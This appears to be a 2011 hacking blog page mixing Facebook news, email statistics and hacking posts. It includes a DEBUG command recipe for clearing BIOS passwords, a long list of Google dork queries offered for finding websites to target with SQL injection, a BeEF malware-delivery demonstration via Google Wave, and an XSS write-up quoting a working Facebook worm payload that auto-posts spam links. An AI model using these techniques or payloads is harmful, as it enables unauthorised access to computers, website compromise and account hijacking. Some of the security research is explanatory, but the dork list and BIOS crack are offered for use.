Connect With Me In Facebook

Welcome to DefendHackers, If u want to Apply for a Blogroll as a Author , With h4ckfreak Mail me @ suren.click@gmail.com

Mark Zuckerberg tells 8th graders “there’s no shortcuts” and to make friends

By h4ckfreak

Metasploit Quick Start Referennce Guide

Metasploit Quick Start Referennce Guide , By h4ckfreak

IP Security

IP Security By H4ckfreak.

15 Network Admin Apps for Android

15 Network Admin Apps for Android , By h4ckfreak

Break All OS Passwords Using KON

Break All OS Passwords Using KON , By h4ckfreak

Recover Or Reset Ur Windows Pwd Using Ubuntu

Recover Or Reset Ur Windows Pwd Using Ubuntu , By h4ckfreak

Security Blueprint For Ethical Hackers..

By h4ckfreak

Blocking IP Using IPSec

By h4ckfreak

Preventing DDos Attacks, Combat Steps abd Tools...

By h4ckfreak

Sunday, June 12, 2011

Mark Zuckerberg tells 8th graders “there’s no shortcuts” and to make friends



When I graduated from eighth grade, my class got a pizza party. When the students at Belle Haven Middle School in Menlo Park, Calif. graduated, they got Mark Zuckerberg. Zuckerberg, or Mark Zuckerman, as the principal accidentally introduced him as, spoke at the eighth-grade graduation relaying some of the most important life lessons he’s learned during his 27 years on this planet.
Mr. Z, as the principal also called Zuckerberg, is moving the Facebook offices to Menlo Park and said the company is going to be neighbors with the school. Zuckerberg stressed three main things in his speech that he claims society got wrong: There are no shortcuts in life, great relationships are extremely important, and do what you love.
Zuckerberg started by saying that everything that’s worth doing is actually really hard and take s  a lot of work. He said society often isn’t quite right when things in movies and TV appear to have come to fruition without much work. Mr. Z alluded to the Social Network movie in one of his examples. He said that a film about a kid in college with an idea that became this big business overnight “couldn’t be further from the truth.” He said it’s “not about a single moment of inspiration or brilliance.” Instead, it’s about years and years of hard work and practice. He said that a lot of building a company or product like Facebook is just about determination and believing that you can do it. He stressed that it’s actually hard work that underlies everything that you do, and “there’s no shortcuts.”
Secondly, Zuckerberg stressed the value of friendship and forming good relationships with people you can trust. He said that a lot of people will tell you to just focus on school and grades while you’re growing up, but that it’s important to focus on having friends and really enjoying yourself, too. Zuckerberg said that a lot of times the experts tell you that you can’t do something even when you think you can. He said this is another thing that society gets wrong a lot. Zuckerberg said great friendships are what makes life a lot of fun and meaningful and enables you do to awesome things.
 Watch this Video here :


Lastly, Zuck told the students to “do what you love.” He said that you can set your minds to a lot of different things, and you can overcome things you don’t like doing, but that it’s a lot easier to focus on challenges that you actually enjoy doing. “If you do stuff that you love, it’s a lot more meaningful and takes on a lot more purpose,” said Mr. Z.
It all sounds so easy coming from Zuckerberg, the world’s youngest billionaire. But who knows, maybe some of these eighth graders will be working with Zuck in a few years.

Thursday, June 9, 2011

Crack BIOS Mater Password (UPDATED)





Basic BIOS password crack - works 9.9 times out of ten



This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following:
Get DOS prompt and type:
DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter
Restart the computer. It works on most versions of the AWARD BIOS.

Disable Facial Recognition in FACEBOOK

I rarely upload photos to my Facebook account and was surprised the other day when, after uploading a few vacation pictures, Facebook had identified the faces of the people in my photos and asked if I wanted to tag them. Of course, it’s not always accurate, but I was impressed at how Facebook got about nine out of 10 matches right, identifying the correct names with the faces. It made my tagging-time much lower, but it also creeped me out a bit. Where did this feature come from, and why wasn’t I notified of it?





The facial recognition feature, called Tag Suggestions, is selected as the default on Facebook, which, not surprisingly, has a lot of people upset. It’s really not hard to change the settings, but it’s a little annoying that you have to opt out instead of opt in. If you’d prefer to opt out and turn off facial recognition, here’s how:
    1. Look to the upper-right-hand corner of your screen and click the Account drop-down menu. 2. Click Privacy Settings. 3. Select the Custom tab on the left-hand side of the column towards the bottom of the page. 4. Select the Customize Settings option at the bottom. 5. The second set of options on this page is “Things others share.” Click on the Edit Settings button under “Suggest photos of me to friends.” 6. Here, you’ll see a dropdown menu on the right selected as “Enabled.” Click that and change to Disabled.
And that’s it! Once you disable the Tag Suggestions feature your friends won’t be able to automatically tag you in any photos. You may not see the option yet, but it’s coming. Facebook is in the process of rolling it out worldwide, so make sure to check back if you’re concerned about being tagged. If not, don’t worry about it and wait for the slew of email notifications from your Facebook friends telling you that you’ve been tagged in 30 photos.

Wednesday, June 8, 2011

Mark Zuckerberg Kills What he Eats




Mark Zuckerberg leaned Chinese last year. This year Mark Zuckerberg is pursuing a new “personal challenge”, when he’s not busy connecting people across the world. Its about food. Mark Zuckerberg only eats what he kills. It includes a lobster, chicken, pig and a goat. Zuckerberg even posted a message on his private Facebook page on May 4 saying:
“I just killed a pig and a goat.”

Mark takes a personal challenge each year (in 2009, he wore a tie every day), and this year is about animals and meat.
“This year I’ve basically become a vegetarian since the only meat I’m eating is from animals I’ve killed myself,” Zuckerberg wrote in an email to Fortune.
He told Fortune in an email that:
I spend almost all of my time building Facebook, so these personal challenges are all things I wouldn’t normally have the chance to do if I didn’t take the time. Last year, for example, my personal challenge was to learn Chinese. I blocked out an hour every day to study and it has been an amazing experience so far. I’ve always found learning new languages challenging, so I wanted to jump in and try to learn a hard one. It has been a very humbling experience. With language, there’s no way to just “figure it out” like you can with other problems — you just need to practice and practice. The experience of learning Mandarin has also led me to travel to China, learn about its culture and history, and meet a lot of new interesting people


This year, my personal challenge is around being thankful for the food I have to eat. I think many people forget that a living being has to die for you to eat meat, so my goal revolves around not letting myself forget that and being thankful for what I have. This year I’ve basically become a vegetarian since the only meat I’m eating is from animals I’ve killed myself. So far, this has been a good experience. I’m eating a lot healthier foods and I’ve learned a lot about sustainable farming and raising of animals.
I started thinking about this last year when I had a pig roast at my house. A bunch of people told me that even though they loved eating pork, they really didn’t want to think about the fact that the pig used to be alive. That just seemed irresponsible to me. I don’t have an issue with anything people choose to eat, but I do think they should take responsibility and be thankful for what they eat rather than trying to ignore where it came from.

Thursday, June 2, 2011

35 Funnaeh Statistics About Email One Should Know



Back with a New Job, Gottaa tell you all My Job Gonna Keep me Busy Hereafter, And i am learning Alot  and enjoy learning and i Love My JOB...!!     Ok  Come Back to trackWhether you are gathering research for marketing, trying to support a project or just making a point the use of statistics always helps build a stronger argument. The following list of statistics were put together regarding email and fall under a variety of subjects such as general email, email marketing and, of course, email security.
  1. In 2011  there were 1.9 billion email users worldwide. That is projected to grow to 2.5 billion users by the year 2014.
  2. In 2010 there were an estimated 2.9 billion email mailboxes. 730 million of them are business email inboxes.
  3. There was an estimated 294 billion emails sent every day in 2010 totaling over 90 trillion emails sent every year, or 2.8 million emails sent every second.
  4. The average number of emails sent by a typical business user each day is 43. That same user receives an average of 130 emails each day.
  5. Of those 294 billion email messages sent every day it is estimated that 90% of them are spam or malicious.
  6. The average corporate employee spends 25 percent of their work day on email related tasks. This is compared to 14 percent spent on face to face meetings and 9 percent spent on the phone.
  7. The amount of spam is increasing at a rate of 20 to 25 percent every year.
  8. 74% of all adults online state that email is the preferred method of communication.
  9. A Yahoo! survey found that one third of all people would rather clean their toilets than clean out their email inbox.
  10. The average size of an email message is 75 KB which is about 7000 words in plain text.
  11. The average size of a spam message is less than 5 KB in size.
  12. The average user spends about 1 hour and 47 minutes using email.
  13. One third of all people aged 18 to 34 check their email when they first wake up.
  14. 62 percent of people admit that they regularly check work email over the weekend and 50 percent admit to checking work email while on vacation. 78 percent of this is done using mobile devices.
  15. Lost productivity due to dealing with spam costs businesses approximately $897.86 per user every year.
  16. 26 percent of Small and Medium Sized Businesses will suffer around 30 minutes of unplanned downtime every month when it comes to email services.
  17. In 2008 there were 158 billion marketing emails sent by US retailers and wholesalers. By 2013 that number is expected to grow to 258 billion.
  18. 91 percent of all spam contains some sort of link.
  19. 18 percent of all spam makes use of a URL link shortening service.
  20. Out of the 76 billion spam messages sent with a Bit.ly shortened URL, 168,000 where clicked at a rate of .0002 percent.
  21. 64 percent of all spam messages are related to a pharmaceutical product. Other popular topics include Casinos at 7 percent and watches at 6.5 percent.
  22. 1 in 284 emails contain malware.
  23. 1 in 445 emails are phishing attempts.
  24. Only .7 percent of spam comes from free webmail services like Gmail or Hotmail.
  25. 1.1 percent of spam were forged to look like they were sent from legitimate webmail accounts.
  26. Botnets account for 88.2 percent of all spam sent to your inbox.
  27. A single bot sends approximately 77 spam emails per minute.
  28. In 2010 there were over 339,600 different malware strains identified in emails that were blocked as being malicious.
  29. In 2010 Italy intercepted the highest percentage of spam at 93.5 percent.
  30. The continent responsible for sending the highest percentage of spam in 2010 was Europe at 39.3 percent.
  31. Before it was brought down, Rustock was responsible for 47.5 percent of all spam, or 44.1 billion spam messages sent out every day.
  32. The second most productive spam botnet in 2010, the Grum botnet, was responsible for 9 percent of all spam equaling 7.9 billion messages a day.
  33. Roughly 93 percent of all spam in 2010 was sent in English. 5.7 percent of these messages were considered to be unknown.
  34. Only 33 percent of all spam messages sent to Brazilian email addresses was sent in Portuguese.
  35. In 2010 Outlook was the most popular email client with 36.71 percent of the market share. Hotmail was second with 16.23 percent.

Tuesday, May 17, 2011

Google Dorks To Find Targets For SQL Injection



Following are Google Dork queries that can help you find sites that might be vulnerable for SQL injection attacks. Please note that they will not find sites that are vulnerable, they’ll just predict sites that might be vulnerable, and you have to check them for vulnerability. So here’s your list, [Guys may be u Can Use ACUNETIX Or WEB Vulnerability Scanner for More Bugs]







allinurl:index.php?id=
allinurl:trainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id= 
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=
allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:news.php?id=
allinurl:index.php?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID=
allinurl:index.php?=
allinurl:profile_view.php?id=
allinurl:category.php?id=
allinurl:publications.php?id=
allinurl:fellows.php?id=
allinurl:downloads_info.php?id=
allinurl:prod_info.php?id=
allinurl:shop.php?do=part&id=
allinurl:productinfo.php?id=
allinurl:collectionitem.php?id=
allinurl:band_info.php?id=
allinurl:product.php?id=
allinurl:releases.php?id=
allinurl:ray.php?id=
allinurl:produit.php?id=
allinurl:pop.php?id=
allinurl:shopping.php?id=
allinurl:productdetail.php?id=
allinurl:post.php?id=
allinurl:viewshowdetail.php?id=
allinurl:clubpage.php?id=
allinurl:memberInfo.php?id=
allinurl:section.php?id=
allinurl:theme.php?id=
allinurl:page.php?id=
allinurl:shredder-categories.php?id=
allinurl:tradeCategory.php?id=
allinurl:product_ranges_view.php?ID=
allinurl:shop_category.php?id=
allinurl:transcript.php?id=
allinurl:channel_id=
allinurl:item_id=
allinurl:newsid=
allinurl:trainers.php?id=
allinurl:news-full.php?id=
allinurl:news_display.php?getid=
allinurl:index2.php?option=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:newsone.php?id=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:aboutbook.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:pages.php?id=
allinurl:clanek.php4?id=
allinurl:announce.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:viewapp.php?id=
allinurl:viewphoto.php?id=
allinurl:rub.php?idr=
allinurl:galeri_info.php?l=
allinurl:review.php?id=
allinurl:iniziativa.php?in=
allinurl:curriculum.php?id=
allinurl:labels.php?id=
allinurl:story.php?id=
allinurl:look.php?ID=
allinurl:newsone.php?id=
allinurl:aboutbook.php?id=

Friday, May 13, 2011

How to Use Google Wave , Tool for Hacking


I Thought i was Fooled When Google WAVE Was released On April 1 , After a day only i Fathom that Google Wave Service Exists ..Well Coming to tha Point ,Many security researchers and hackers are familiar with BeEF, a browser exploitation framework by Wade Alcorn. In short, BeEF is a program that brings together various types of code for taking advantage of known vulnerabilities in web browsers. If a target computer loads a certain bit of code within a web page, that code connects to a server control panel which can then execute certain attacks against the “zombie” machine.
After noting potential security issues with the gadgets in Google Wave, I set about to finally setup a BeEF testbed and see if Google Wave was as capable a platform for malware delivery.




Example of a BeEF zombie spawned via Google Wave
The picture above shows the results. I successfully created a Google Wave gadget that creates a new BeEF zombie whenever someone views the wave. This does not allow for the keylogger function of BeEF, but I did send an alert dialog (as shown) and used the Chrome DoS function to crash the browser tab. (I could also detect that the zombie machine had Flash installed – imagine the possibilities of using Flash or PDF exploits in an auto-loaded gadget.)
What’s even more disconcerting is that BeEF can integrate with Metasploit to potentially take over a victim’s machine. I do not currently have Metasploit setup to test using Autopwn, but based on my experiences so far, I’m fairly confident such an attack would succeed.
All of these demonstrations about security and Google Wave point to four general weaknesses in Wave’s current structure:
  1. Allowing scripts and iframes in gadgets with no limits apart from sandboxing
  2. Lack of control over what content or users can be added to a wave
  3. No simple mechanism for verifying gadget sources or features
  4. Automatically loading gadgets when a wave is viewed
Any one of these issues would be cause for concern, but taken together they present such alarming possibilities as a user getting their computer hacked simply by viewing a wave. Whatever may be said about Google Wave’s usefulness, I have to conclude that the product is not ready for prime time until these types of problems are addressed.

Thursday, May 12, 2011

Recent Facebook XSS Attacks (A Small Research)

A few weeks ago, three separate cross-site scripting (XSS) vulnerabilities on Facebook sites were uncovered within a period of about 10 days. At least two of these holes were used to launch viral links or attacks on users – and it’s clear that attacks against Facebook users are becoming increasingly sophisticated.



The first issue came from a page on the mobile version of Facebook’s site. The interface was a prompt for posting stories to a user’s wall, and the parameter for the text of the prompt did not properly escape output. On March 28, a blogger identifying themselves as “Joy CrazyDaVinci” posted code that demonstrated how the vulnerability could be used to spread viral links:
<iframe id=”CrazyDaVinci” style=”display:none;”
src=”http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’<script>window.onload=function(){document.forms[0].message.value=’Just visited http://y.ahoo.it/gajeBA Wow.. cool! nice page dude!!!‘;document.forms[0].submit();}</script>”></iframe>
This bit of HTML would be included in a viral page. The code sets the content of the wall post to a message that includes a link to a viral page, then submits the prompt automatically. Anyone clicking the link would get the same code executed on their account. The viral page could be used for malware distribution or phishing attacks, but in most cases where I saw this trick used, the page simply loaded advertisements or “offer spam”.



By the next day, several links were spreading virally and caught the attention of security researchers. Facebook moved quickly to patch the issue, and Crazy DaVinci issued an apology for the example code, explaining that versions of it had actually been circulating for several days prior and that the demonstration was intended to push Facebook for a fix.
On April 3, another XSS problem came to light, this time with a Facebook “channel” page used for session management. Both another security researcher and I had previously looked at this interface and found it properly escaped, so it’s likely a code update mistakenly changed the page’s behavior. Facebook again patched the problem soon after news of it spread.
I didn’t observe any viral exploitation of the second vulnerability in the wild, but after the first problem came to light, I noted that it was mostly used to submit a form already on the page for posting links. The payload made use of functionality within the vulnerable page, but XSS allows an attacker to do far more. I wondered when we might see a Facebook attack that made greater use of cross-site scripting’s potential.

What a Difference a Space Makes

I didn’t have to wait long. On April ,I got word via Twitter of a Facebook app that had live XSS, but the app had disappeared before I got to see it in action. At first, I thought this was yet another case of XSS within the context of a Facebook app. But I soon found other version of the app which were still online, and I quickly realized this was actually an XSS problem with the Facebook Platform. Also, the XSS payload being used did much more than submit a form.
The attack used FBML-based Facebook apps, which render in the context of an apps.facebook.com page. Normally, Facebook filters code to prevent any scripts from directly modifying the page’s DOM, but the XSS problem gave attackers a bypass. When a user visited the app page, they would see what appeared to be a fairly benign page with a popular video.

Unlike many Facebook page scams, the promised video actually works – if you click play, the video will load and nothing unusual seems to happen. But as the code screenshot below reveals, that click does much more than load the video.





When the page first loads, the “video” is actually just an image placeholder with a link. Part of the href parameter for that link is shown above. Note the space after the opening quotation mark – that’s where the XSS comes in. Normally, Facebook would block a link to a javascript: URL. Adding the space worked around Facebook’s filters, but the browser would still execute the rest of parameter.


According to Facebook, it turned out that some older code was using PHP’s built-in parse_url function to determine allowable URLs. For example, while parse_url(“javascript:alert(1)”) yields a scheme of “javascript” and a path of “alert(1)”, adding whitespace gives a different result: parse_url(” javascript:alert(1)”) does not return a scheme and has a path of “javascript:alert(1)”. Other PHP developers should take note of the difference if parse_url is being used in security-related code.

A More Advanced Attack

Clicking the link executed an inline script that in turn added a script element to the page. This loaded more code from a remote address and included several parameters in the GET request. The parameters set variables within the remote code that specified what video to load, what URLs to use for viral posts, and so on. Multiple Facebook apps and domains were used for the viral links, but the main script always came from the same host. This helped the attack persist, since blocking one site would not stop it and the central code was loaded dynamically.
The remote code handled actually loading the video, but also included a number of functions which make use of having script access in a facebook.com context. The script would set the user as attending spam events, invite friends to those events, “like” a viral link, and even send IMs to friends using Facebook Chat.
When I came across the attack, one block of code had been commented out, but one blogger discovered a version of the attack a few days prior and saw it in action. This part loaded a fake login form which actually sent the entered username and password to a log interface on the attacker’s server. (Remember, this phishing form would appear in the context of a page with typical Facebook chrome.) Since the attack page would load even if a user was not logged in to Facebook, this could have also been a way to make sure a session was available before launching the other functions.
Fake videos and viral links are nothing new on Facebook, but most of these scams tend to be fairly simple. In fact, it’s not hard to find forums where people offer boilerplate code for launching such schemes – much like the first XSS worm above which simply submitted a form. But the April XSS attack involved multiple domains, multiple user accounts, and multiple methods for spreading and hijacking user accounts. And it still only scratched the surface of what’s possible with an XSS vulnerability. I expect we’ll see more XSS-based attacks and more powerful payloads in the future.

Postscript on Real-Time Research

I came across the April attack late one afternoon as I was preparing to leave work… so I could present on XSS at a local OWASP meeting! Those following me on Twitter saw a somewhat frantic stream of tweets as I tried to find live examples of the attack and sorted through the code while closely watching the clock and wrapping up last-minute presentation details. Earlier this week, I did some searching to review information for this post, and I came across this article from eWEEK: “Facebook Bully Video Actually an XSS Exploit“.



I was a bit surprised by it, as I hadn’t known about it before and saw that it quoted me. I then realized it was quoting my tweets! I then read that I had “confirmed to eWEEK on Twitter” one aspect of the story. At first I was confused, but then remembered that during my flood of tweeting, another user had sent an @ reply asking about the very detail the story talked about. Checking that tweet again, I found out the question had come from the article’s author.
I relate all this not because any of it bothered me, simply because
(1) I found it somewhat fascinating that a few quick Twitter updates could become the primary source for a news article and

(2) I was humbled to realize that a few quick Twitter updates could become the primary source for a news article! While it’s great that a story can spread so fast, it was certainly gave me a reminder to be careful when discussing topics of interest on a public forum.


But I’m glad I can do my part in helping raise awareness of online dangers, particular the implications of XSS.